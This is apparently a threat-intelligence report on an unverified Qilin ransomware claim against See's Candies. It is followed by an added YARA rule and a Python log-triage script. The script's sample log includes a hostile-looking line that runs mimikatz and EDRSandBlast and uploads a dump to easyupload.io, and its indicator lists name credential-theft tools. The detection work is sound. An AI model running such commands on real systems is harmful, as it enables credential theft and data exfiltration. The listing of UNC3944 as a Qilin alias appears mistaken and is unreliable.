See's Candies Ransomware Attack by Qilin (Apr 2026)
Unverified dark web claim. This report is based on a post observed on a dark web forum. Yazoul Security has not independently verified the authenticity of this claim.
Leak Site Screenshot
Screenshot captured at time of discovery. Image blurred to protect victim PII.
Claim Summary
On April 30, 2026, the Qilin ransomware group allegedly added See’s Candies (www.sees.com) to its dark web leak site. The threat actor claims to have compromised the US-based confectionery company, which operates in the Agriculture and Food Production industry. As of this writing, no data sample, proof of exfiltration, or ransom demand has been published. The data volume is listed as undisclosed. This claim has not been independently verified by Yazoul Security.
Threat Actor Profile
Qilin (also tracked as Agenda, Gold Feather, or UNC3944) is a ransomware-as-a-service (RaaS) group first observed in 2022. According to available intelligence, the group has claimed 1,617 victims across multiple sectors, with a particular focus on manufacturing, healthcare, and food production. Their credibility is moderate to high based on their track record of posting verifiable data samples in past attacks.
Known Tools and Tactics:
- Initial Access: SMS phishing, SIM swapping, and compromised credentials (per Google Cloud threat intelligence).
- Defense Evasion: Uses EDRSandBlast to blind endpoint detection and response systems, PCHunter and PowerTool for kernel-level tampering.
- Credential Theft: Mimikatz for harvesting credentials from memory.
- Reconnaissance: Nmap and Nping for network scanning.
- Exfiltration: EasyUpload.io and MEGA for data staging and exfiltration.
- Propagation: Custom PowerShell scripts to spread to VMware vCenter and ESXi hypervisors (per Trend Micro research).
Qilin is known for double extortion: encrypting systems while threatening to leak stolen data. Their leak site operations are generally consistent, though they occasionally post victims without immediate data samples to pressure negotiations.
Alleged Data Exposure
No specific data types or volumes have been disclosed by Qilin. The group has not released any screenshots, file listings, or sample archives to substantiate their claim. This could indicate:
- The attack is in early stages of negotiation.
- The group is bluffing to pressure See’s Candies.
- Data exfiltration was limited or unsuccessful.
Without evidence, the claim should be treated with high skepticism.
Potential Impact
If the claim is verified, See’s Candies could face:
- Operational Disruption: Encryption of production systems, order management, or supply chain infrastructure.
- Data Breach: Potential exposure of customer PII (names, addresses, payment data), employee records, or proprietary recipes.
- Reputational Damage: Loss of consumer trust in a heritage brand.
- Regulatory Consequences: Potential GDPR or CCPA violations if EU/California customer data is involved.
The food production sector is particularly sensitive to ransomware due to just-in-time supply chains and perishable inventory.
What to Watch For
- Leak Site Updates: Monitor Qilin’s site for any data samples or download links in the coming days.
- Official Statements: See’s Candies may issue a press release or SEC filing if the incident is confirmed.
- Technical Indicators: Look for Qilin’s known tools (Mimikatz, EDRSandBlast) in network logs or EDR alerts.
- YARA Rules: For detection, consider rules targeting Qilin’s custom PowerShell scripts and EDRSandBlast artifacts. Sample rule:
rule QILIN_PS_Propagation
{
    strings:
        $s1 = "Invoke-Command" nocase
        $s2 = "vCenter" nocase
        $s3 = "ESXi" nocase
    condition:
        // All three strings also appear in legitimate vSphere automation, so a match
        // is a hunting/triage lead to be correlated with the tooling above, not a block verdict.
        all of them
}
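As an added example (not part of the Yazoul report), the following Python applies the same three-string test as the sample YARA rule to PowerShell script-block log records, combines it with the Qilin tool and exfiltration-host names listed in the threat actor profile, and scores each record so that the weak propagation signal on its own does not page an analyst. The record format, weights, constructed sample records and the mega.nz domain are my assumptions.

```python
import json

# Indicator families taken from the report's Qilin profile. Weights, the record
# format and the sample records are constructed for this example; "mega.nz" is an
# assumed domain for the report's "MEGA".
PROPAGATION = ("invoke-command", "vcenter", "esxi")   # same three strings as the YARA rule
TOOLING = ("mimikatz", "edrsandblast", "pchunter", "powertool")
EXFIL_HOSTS = ("easyupload.io", "mega.nz")

def triage_script_block(record: dict) -> dict:
    """Score one PowerShell script-block log record (4104-style) for Qilin-like content.

    The YARA-style co-occurrence is weighted low: legitimate vSphere automation also
    uses Invoke-Command against vCenter/ESXi, so it is a hunting lead, not a verdict.
    """
    text = record.get("ScriptBlockText", "").lower()
    score, reasons = 0, []
    if all(s in text for s in PROPAGATION):
        score += 1
        reasons.append("propagation strings co-occur (YARA rule match)")
    tools = sorted(t for t in TOOLING if t in text)
    if tools:
        score += 3 * len(tools)
        reasons.append("known Qilin tooling: " + ", ".join(tools))
    hosts = sorted(h for h in EXFIL_HOSTS if h in text)
    if hosts:
        score += 3
        reasons.append("exfiltration staging host: " + ", ".join(hosts))
    return {"id": record.get("RecordId"), "score": score, "reasons": reasons}

def triage_log(lines, threshold=4):
    """Parse JSON lines; return records scoring at or above threshold, highest first."""
    findings = [triage_script_block(json.loads(l)) for l in lines if l.strip()]
    return sorted((f for f in findings if f["score"] >= threshold), key=lambda f: -f["score"])

# Constructed sample records: a benign vSphere maintenance job and a suspicious block.
SAMPLE_LOG = [
    json.dumps({"RecordId": "1", "ScriptBlockText":
        "Invoke-Command -ComputerName vcenter01 { Get-VMHost esxi* | Set-VMHost -State Maintenance }"}),
    json.dumps({"RecordId": "2", "ScriptBlockText":
        "Invoke-Command -ComputerName vcenter01 { .\\EDRSandBlast.exe; .\\mimikatz.exe }; "
        "Invoke-WebRequest -Uri https://easyupload.io/upload -InFile esxi-dump.zip"}),
]

if __name__ == "__main__":
    for f in triage_log(SAMPLE_LOG):
        print(f["id"], f["score"], "; ".join(f["reasons"]))
```

The benign maintenance record matches the YARA rule but stays below the threshold; the second record is surfaced because tooling and staging-host indicators co-occur with it.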
Disclaimer
This report is based on unverified claims posted by the Qilin ransomware group on their dark web leak site. Yazoul Security has not independently confirmed the compromise of See’s Candies. Ransomware groups routinely exaggerate or fabricate claims to pressure victims. No data samples, PII, credentials, or download links are included in this report. Organizations should treat this information as intelligence for monitoring purposes only and await official confirmation from See’s Candies or relevant authorities.
For ongoing monitoring, see Yazoul Security’s dark web monitoring section at /intel/ransomware/.